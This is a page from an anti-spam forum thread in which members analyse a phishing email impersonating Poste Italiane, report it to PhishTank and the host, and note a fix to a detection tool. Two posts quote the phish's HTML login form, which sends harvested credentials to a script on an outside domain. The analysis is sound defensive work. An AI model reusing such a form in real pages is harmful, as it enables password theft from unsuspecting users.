Last visit was: Sat Jul 05, 2014 2:55 pm
It is currently Sat Jul 05, 2014 2:55 pm

What's this phish doing?


All times are UTC - 5 hours [ DST ]


 [ 18 posts ]  Go to page Previous  1, 2
Author Message
 PostPosted: Fri Jan 20, 2012 9:09 pm   
Spammer Killing Machine
User avatar

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
Regarding http://www.spamcop.net/sc?id=z5229153446z9f151b466025ba16b4c8e4baad30b919z;action=display ,
efa wrote:
... and no POST tag are there.
I noticed this:
Code:
<FORM NAME="Login" method="POST" action="www.emo-ett.si/done.php" onsubmit="javascript: return logintest(this);">

The email constructs an HTML form that collect passwords and other data. I did not test the form to see if JavaScript altered its action, but it appears to use a POST service provided by www.emo-ett.si (in Slovenia) that logs the stolen data before redirecting to the legitimate http://poste.it site.

I have taken the liberty of sharing the email message with PhishTank: http://www.phishtank.com/phish_detail.php?phish_id=1346220
and with WOT: http://www.mywot.com/en/scorecard/emo-ett.si/comment-39291654
The PhishTank screenshot most probably shows the legitimate Poste Italiane web page, after the redirection which I mentioned.

[Edited for grammar.]


Last edited by NotBuyingIt on Tue Jan 24, 2012 2:33 am, edited 1 time in total.

Top
 Profile  
 PostPosted: Sat Jan 21, 2012 12:51 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
I'd like to add that the complete idiot behind this particular phishing effort hasn't even constructed the form properly.

Code:
<FORM NAME="Login" method="POST" action="www.emo-ett.si/done.php" onsubmit="javascript: return logintest(this);">

That will fail. He didn't include the "http://" in the "action" portion of the form tag, so it will look for a local file named "www.emo-ett.si/done.php", which doesn't exist.

Worse: he hasn't labeled his inputs, so there are five fields which aren't described, for which the phishing victim won't understand their expected values.

A true genius. :roll:

I'm reporting the phishing attack to the hosting company for emo-ett.si. Never hurts.

SiL


Top
 Profile  
 PostPosted: Mon Jan 23, 2012 5:29 pm   
Spammer Exterminator

Joined: Wed May 02, 2007 8:59 pm
Posts: 1055
oh, was a bug in xPhish V.0.01.04 2011/11/15.
I corrected this in V.0.01.05 2012/01/23, now it can find POST links also when no other NOT scam links are found.
Thank you.


Top
 Profile  
 [ 18 posts ]  Go to page Previous  1, 2

All times are UTC - 5 hours [ DST ]


Who is online

Users browsing this forum: Wayback machine and 0 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  


Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Style originally created by Volize © 2003 • Redesigned SkyLine by MartectX © 2008